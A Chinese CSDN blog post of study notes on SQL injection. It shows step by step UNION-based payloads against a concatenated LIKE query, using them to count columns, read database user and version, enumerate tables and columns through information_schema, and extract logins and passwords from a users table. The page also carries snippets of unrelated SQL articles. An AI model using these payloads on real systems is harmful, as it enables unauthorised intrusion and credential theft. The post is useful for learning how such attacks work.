sql查询语句记录

已于 2022-05-22 00:18:16 修改
阅读量545 收藏
点赞数
分类专栏: 笔记
于 2022-04-11 20:04:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jacoh/article/details/124084097
版权

SQL注入 数据库安全 信息泄露 恶意输入 SQL拼接
关键词由CSDN通过智能技术生成

在sql语句执行中,通常涉及到安全方面的问题,例如sql 注入等;该文章记录一些存在注入漏洞时,常用的一些sql 语法。

示例 1. 获取数据库用户信息

当后端使用了sql 字符串拼接的方式进行数据查询时:

# 后端原始查询语句
select * from movies where title like '%' + title + '%';

当输入 title 内容为 ’ union select 1,2 – 时,拼接后的 sql 语句如下:

select * from movies where title like '%' union select 1, 2 -- %';

如果movies表中列的个数不为 2 时,则会提示错误:
Error: The used SELECT statements have a different number of columns
逐次增加 1,2 的个数即可得出 movies 表的列个数 。

对 title 变量进行进一步修改,得到如下语句,将输出对应的user、版本等信息:

select * from movies where title like '%' union select 1,user(),database(),table_name,version(),6,7 from information_schema.tables where table_schema=database() -- %';

从上面语句的执行结果可以看到全部的 table_name;假设输出中 table_name 列中有 users 表,则可以进一步拼接sql如下:

select * from movies where title like '%' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users' -- %';

通过字段名称,可以找到敏感的列信息:

select * from movies where title like '%' union select 1,id,login,4,password,6,7 from users -- %';

这样就可以获取数据库中存储的用户信息,一切操作均是有输入引发,以此达到sql 注入攻击效果。

(待更新…)

Zhi.C.Yue
关注
专栏目录
SQL一条语句统计记录总数及各状态数
01-19
方法一、 代码如下:SELECT SUM(正确数)+SUM(错误数) AS 总记录数,SUM(正确数),SUM(错误数) FROM ( SELECT COUNT(1) 正确数,0 错误数 FROM TB WHERE STATUS=1 UNION ALL SELECT 0 正确数,COUNT(1) 错误数 FROM TB WHERE STATUS=0) a 方法二、 代码如下:select count(1)总记录数,sum(case when status=1 then 1 else 0 end)正确数,sum(case when status=0 then 1 else 0 end) 错
oracle消耗资源的sql查询语句记录
06-25
### Oracle消耗资源的SQL查询语句记录 在Oracle数据库管理中,监控和优化SQL查询是确保系统性能稳定的关键环节之一。对于那些消耗大量资源的SQL语句进行记录和分析可以帮助DBA快速定位问题并采取相应的优化措施。...
SQL语句查询记录
denglinglin2653的博客
04-15 375
  1、查询一张表两个datetime字段,时间相差的秒数,条件:具体到某一天and差值大于400s,并且按照差值排序。     SELECT end_time,start_time,UNIX_TIMESTAMP(end_time)-UNIX_TIMESTAMP(start_time)from XXX WHERE date_format(start_time,'%Y-%m-%d')='...
mysql查看sql的执行历史
最新发布
weixin_36866839的博客
07-18 761
MySQL查看SQL的执行历史 MySQL是一种广泛使用的开源关系数据库管理系统,它提供了许多功能来帮助开发者和数据库管理员更好地管理和监控数据库。其中,查看SQL的执行历史是一个非常重要的功能,可以帮助我们了解数据库的操作情况,分析性能瓶颈,以及排查问题。 1. MySQL查询日志 MySQL提供了两种查询日志:慢查询...
关于sql查询记录
weixin_43842840的博客
11-15 157
仅供自己参考 1.查询A表而不存在B表 ① select distinct * from A where A.id not in (select B.id from B) ② select A.id from A left join B on(A.id = B.id) ③ select * from A where (select count(1) as num from B where A.id...
SQL查询语句基本语法(DQL:查询表中的记录
Hui_Hong_TaiLang的博客
04-25 921
语法: select 字段列表 from 表名列表 where 条件列表 group by 分组字段 having 分组之后的条件 order by 排序 limit 分页限定 基础查询 多个字段的查询 select 字段名1,字段名2… from 表名; 注意: 如果查询所有字段,则可以使用*来替代字段列表。 去除重复: distinct 计算列 一般可以使用四则运...
sql查询本年的所有记录
qq_36532177的博客
01-11 3969
select * from 表 where DATE_FORMAT(表.字段,'%Y') = DATE_FORMAT(SYSDATE(),'%Y')
SQL语句去掉重复记录,获取重复记录
09-11
SQL语句去掉重复记录,获取重复...本文介绍了如何使用SQL语句去掉重复记录、获取重复记录,并且提供了SQL Server和Access中查询所有表名和字段名的方法。这些技术可以帮助开发者和数据库管理员更好地管理和维护数据库
SQL语句查询数据库中重复记录的个数
12-15
代码如下:select a,b,c,count(*) from (select c.a,c.b,c.c from test c) having count(*) >= 2 group by a,b,c 或者 代码如下:select zdbh,... 您可能感兴趣的文章:用SQL语句查询数据库中某一字段下相同值的记录方法
易语言-程序结合SQL语句结构,动态实现SQL多条件查询语句代码
06-29
在本文中,我们将深入探讨如何使用易语言结合SQL语句结构,动态地实现多条件查询,以满足复杂的数据检索需求。 易语言是中国本土开发的一种编程语言,其设计目标是让编程变得更加简单、直观,适合初学者和专业...
SQL语句语法
03-21
SQL语句是结构化查询语言(Structured Query Language)的简称,是用于管理和处理关系数据库的标准语言。本篇文章将深入探讨SQL语句的基本语法,包括数据定义、数据操作、实用工具、事务处理和锁定、数据库管理、...
SQL查询日志 查看数据库历史查询记录的方法
12-15
好吧,到数据库日志中去找找,通过时间、关键字批配。。能想到的全用上吧。 首先假定你执行过它。没有?好吧,要么它太过简单,要么你太过不简单。。 代码如下: SELECT TOP 1000 –创建时间 QS.creation_time, –查询语句 SUBSTRING(ST.text,(QS.statement_start_offset/2)+1, ((CASE QS.statement_end_offset WHEN -1 THEN DATALENGTH(st.text) ELSE QS.statement_end_offset END – QS.statement_start_offset)
sql查询记录
k_night_lip的博客
12-10 744
sql查询null值判断
关于sql查询操作记录
weixin_30483013的博客
12-13 355
1.--读取库中的所有表名 selectnamefromsysobjectswherextype='u' --读取指定表的所有列名 selectnamefromsyscolumnswhereid=(selectmax(id)fromsysobjectswherextype='u'andname='表名') 2. 转载于:https://www.cnblo...
SQL SERVER操作记录
cxu123321的博客
02-13 1855
启动sql server 在计算机-管理-启动SQL SERVER(...)   根据mdf文件创建数据库 右键-附加
sql查询20到30条记录
热门推荐
wl_ldy的专栏
02-08 3万+
1. MySql查询 mysql> SELECT * FROM table LIMIT 20,10; // 检索记录行 21-30 //为了检索从某一个偏移量到记录集的结束所有的记录行,可以指定第二个参数为 -1: mysql> SELECT * FROM table LIMIT 95,-1; // 检索记录行 96-last. //如果只给
sql语句操作记录
远行的博客
11-01 2913
表的结构为: 查询语句: 调用datediff()日期函数计算抢修天数,getdate()返回系统当前日期和时间 也可计算年龄:datediff(year,birthday,getdate()) 取别名 : select prj_name 工程名,start_date开始日期,end_date,'抢修天数',datediff(day,start_date,end_date...
sql从最终值 操作记录 查询每次操作前操作后的值
翎墨袅
06-17 292
其中sum为最新值,id为物资id teamid为物资id,sum为操作数量 ,state0转入1转出 其中 sql select name,type,nameteam,metering,time,sum,housum,if(state=1,housum+shujv.sum,housum-shujv.sum) qiansum from ( SELECT jilu.id jiluid,wuzi.id wuziid,wuzi.name,wuzi.type,wuzi.metering,gs.namet
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值